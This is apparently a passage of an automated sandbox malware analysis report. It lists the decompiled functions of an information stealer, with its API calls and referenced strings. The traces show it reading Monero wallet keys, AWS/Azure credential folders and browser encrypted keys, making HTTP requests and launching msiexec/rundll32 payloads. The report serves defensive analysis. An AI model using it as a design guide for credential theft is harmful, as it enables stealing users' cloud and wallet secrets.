                              • lstrcat.KERNEL32(?,00000000), ref: 00BED22A
                              • lstrcat.KERNEL32(?,00C0147C), ref: 00BED239
                              • lstrcat.KERNEL32(?,00000000), ref: 00BED24C
                              • lstrcat.KERNEL32(?,00C01480), ref: 00BED25B
                              • lstrcat.KERNEL32(?,00000000), ref: 00BED26E
                              • lstrcat.KERNEL32(?,00C01484), ref: 00BED27D
                              • lstrcat.KERNEL32(?,00000000), ref: 00BED290
                              • lstrcat.KERNEL32(?,00C01488), ref: 00BED29F
                              • lstrcat.KERNEL32(?,00000000), ref: 00BED2B2
                              • lstrcat.KERNEL32(?,00C0148C), ref: 00BED2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 00BED2D4
                              • lstrcat.KERNEL32(?,00C01490), ref: 00BED2E3
                                • Part of subcall function 00BFA820: lstrlen.KERNEL32(00BE4F05,?,?,00BE4F05,00C00DDE), ref: 00BFA82B
                                • Part of subcall function 00BFA820: lstrcpy.KERNEL32(00C00DDE,00000000), ref: 00BFA885
                              • lstrlen.KERNEL32(?), ref: 00BED32A
                              • lstrlen.KERNEL32(?), ref: 00BED339
                                • Part of subcall function 00BFAA70: StrCmpCA.SHLWAPI(009B8BB8,00BEA7A7,?,00BEA7A7,009B8BB8), ref: 00BFAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 00BED3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 54732910fe23dc062c6229e9147990b0312dc7a275a15576dde859d04da74659
                              • Instruction ID: d6aedd5e8ca3c7fe5652962946b81f8b60b0700feca549ef1b53fb79754902b2
                              • Opcode Fuzzy Hash: 54732910fe23dc062c6229e9147990b0312dc7a275a15576dde859d04da74659
                              • Instruction Fuzzy Hash: 25E1E4B19101099BCB18EBA5DD96EFE73B8AF14301F1441A4F606B7091DF756E0ECB62
                              Function 00BEC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,009BD560,00000000,?,00C0144C,00000000,?,?), ref: 00BECA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00BECA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00BECA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BECAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00BECAD9
                              • StrStrA.SHLWAPI(?,009BD578,00C00B52), ref: 00BECAF7
                              • StrStrA.SHLWAPI(00000000,009BD590), ref: 00BECB1E
                              • StrStrA.SHLWAPI(?,009BDDE0,00000000,?,00C01458,00000000,?,00000000,00000000,?,009B8B28,00000000,?,00C01454,00000000,?), ref: 00BECCA2
                              • StrStrA.SHLWAPI(00000000,009BDD00), ref: 00BECCB9
                                • Part of subcall function 00BEC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BEC871
                                • Part of subcall function 00BEC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BEC87C
                              • StrStrA.SHLWAPI(?,009BDD00,00000000,?,00C0145C,00000000,?,00000000,009B8B88), ref: 00BECD5A
                              • StrStrA.SHLWAPI(00000000,009B89C8), ref: 00BECD71
                                • Part of subcall function 00BEC820: lstrcat.KERNEL32(?,00C00B46), ref: 00BEC943
                                • Part of subcall function 00BEC820: lstrcat.KERNEL32(?,00C00B47), ref: 00BEC957
                                • Part of subcall function 00BEC820: lstrcat.KERNEL32(?,00C00B4E), ref: 00BEC978
                              • lstrlen.KERNEL32(00000000), ref: 00BECE44
                              • CloseHandle.KERNEL32(00000000), ref: 00BECE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 74c3db2f1e8db3ad06192d0ff3c274647f14c5983abab218389267f8f6c65499
                              • Instruction ID: c9f39013255d08fe7e7f504414881af27ee350f94fb57fefec3d3f0db40f4ccc
                              • Opcode Fuzzy Hash: 74c3db2f1e8db3ad06192d0ff3c274647f14c5983abab218389267f8f6c65499
                              • Instruction Fuzzy Hash: FEE1E2B190010CABDB18EBA4DC55FEEB7B8AF14340F4441A9F60A77191DF706A4ECB65
                              Function 00BF8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • RegOpenKeyExA.ADVAPI32(00000000,009BB7C8,00000000,00020019,00000000,00C005B6), ref: 00BF83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BF8426
                              • wsprintfA.USER32 ref: 00BF8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BF847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 00BF848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00BF8499
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: c5ee35f02f0235ecbae9f2e829b66cf503b47650b7e31cb4a92c62d1247cf8a4
                              • Instruction ID: d0af570dfe9c51d9e901fa7f2556ccdd722a383c13c6195232be0d896b840528
                              • Opcode Fuzzy Hash: c5ee35f02f0235ecbae9f2e829b66cf503b47650b7e31cb4a92c62d1247cf8a4
                              • Instruction Fuzzy Hash: 4781DDB191011CABDB28DB54CC95FEAB7B8FB48700F0086D9E209A7190DF716B89CF95
                              Function 00BF4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00BF4DCD
                                • Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF492C
                                • Part of subcall function 00BF4910: FindFirstFileA.KERNEL32(?,?), ref: 00BF4943
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00BF4E59
                                • Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C00FDC), ref: 00BF4971
                                • Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C00FE0), ref: 00BF4987
                                • Part of subcall function 00BF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00BF4B7D
                                • Part of subcall function 00BF4910: FindClose.KERNEL32(000000FF), ref: 00BF4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00BF4EE5
                                • Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF49B0
                                • Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C008D2), ref: 00BF49C5
                                • Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF49E2
                                • Part of subcall function 00BF4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00BF4A1E
                                • Part of subcall function 00BF4910: lstrcat.KERNEL32(?,009BF3B0), ref: 00BF4A4A
                                • Part of subcall function 00BF4910: lstrcat.KERNEL32(?,00C00FF8), ref: 00BF4A5C
                                • Part of subcall function 00BF4910: lstrcat.KERNEL32(?,?), ref: 00BF4A70
                                • Part of subcall function 00BF4910: lstrcat.KERNEL32(?,00C00FFC), ref: 00BF4A82
                                • Part of subcall function 00BF4910: lstrcat.KERNEL32(?,?), ref: 00BF4A96
                                • Part of subcall function 00BF4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00BF4AAC
                                • Part of subcall function 00BF4910: DeleteFileA.KERNEL32(?), ref: 00BF4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 888d737fc7a0f6f52be463480bd15424b0e1614d2a30ca5830866c0b23846c79
                              • Instruction ID: 0d0c541264d1a249b8dda25824b70855f2c797e87141d504b185c83e509f84ed
                              • Opcode Fuzzy Hash: 888d737fc7a0f6f52be463480bd15424b0e1614d2a30ca5830866c0b23846c79
                              • Instruction Fuzzy Hash: DB4154B99402086BDB64F760DC4BFEE7278AB64704F0444A4B689660C1EEB45BCDCB92
                              Function 00BF9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BF906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 88cc308a22ba8b40821329be4c8209d4dc5b1e17d993ebdea7e0a25abed45ef8
                              • Instruction ID: 1e09979b0f2341ddd66a6b5769c9a495fa80da90acf80eabb47793101bea83fe
                              • Opcode Fuzzy Hash: 88cc308a22ba8b40821329be4c8209d4dc5b1e17d993ebdea7e0a25abed45ef8
                              • Instruction Fuzzy Hash: 8671EBB1910208AFDB18DFE5DC89FEEB7F8BB48700F148558F615A7290DB74A909CB61
                              Function 00BF2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00BF31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00BF335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00BF34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: b011ce348ab744b2f67db4a2e34072be31d36375163f61cff373b7c633751c78
                              • Instruction ID: 93a30d3bd73c6cc8b43cf58c8b5850aa2114042d98dea03722894fd9ce6a9b49
                              • Opcode Fuzzy Hash: b011ce348ab744b2f67db4a2e34072be31d36375163f61cff373b7c633751c78
                              • Instruction Fuzzy Hash: DE12DFB181010C9ADB19EB90DC92FFDB7B8AF14340F5081A9E60A77195EF746B4ECB52
                              Function 00BF52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE6280: InternetOpenA.WININET(00C00DFE,00000001,00000000,00000000,00000000), ref: 00BE62E1
                                • Part of subcall function 00BE6280: StrCmpCA.SHLWAPI(?,009BF440), ref: 00BE6303
                                • Part of subcall function 00BE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE6335
                                • Part of subcall function 00BE6280: HttpOpenRequestA.WININET(00000000,GET,?,009BEC40,00000000,00000000,00400100,00000000), ref: 00BE6385
                                • Part of subcall function 00BE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BE63BF
                                • Part of subcall function 00BE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BE63D1
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BF5318
                              • lstrlen.KERNEL32(00000000), ref: 00BF532F
                                • Part of subcall function 00BF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BF8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00BF5364
                              • lstrlen.KERNEL32(00000000), ref: 00BF5383
                              • lstrlen.KERNEL32(00000000), ref: 00BF53AE
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 863f15a9e4af50bda4a7128b18fcf1f81d8c799776ee0a1435d1fe854254da55
                              • Instruction ID: efdcef3fa46f1b379d98b9e2ede0645b1af4a502571fb87c4d4a15b942e6a316
                              • Opcode Fuzzy Hash: 863f15a9e4af50bda4a7128b18fcf1f81d8c799776ee0a1435d1fe854254da55
                              • Instruction Fuzzy Hash: 99510F7091014C9BCB18FF64CD96AFD77B9AF10340F5080A4EA0A6B591DF746B4ECB62
                              Function 00BF12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: fe13d3b471ae164adcfbe0459283c1422945d573ca84a244449cbef0b2b7982e
                              • Instruction ID: 31cca1788f6b7bc58e9fc38045a25752fa4581f7171595c5bf29dd8cfef99db8
                              • Opcode Fuzzy Hash: fe13d3b471ae164adcfbe0459283c1422945d573ca84a244449cbef0b2b7982e
                              • Instruction Fuzzy Hash: F2C154B590021D9BCB18EF60DC89FFA73B8BF54304F1445E9F60AA7141DA70AA89CF91
                              Function 00BF4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF42EC
                              • lstrcat.KERNEL32(?,009BEE20), ref: 00BF430B
                              • lstrcat.KERNEL32(?,?), ref: 00BF431F
                              • lstrcat.KERNEL32(?,009BD338), ref: 00BF4333
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BF8D90: GetFileAttributesA.KERNEL32(00000000,?,00BE1B54,?,?,00C0564C,?,?,00C00E1F), ref: 00BF8D9F
                                • Part of subcall function 00BE9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BE9D39
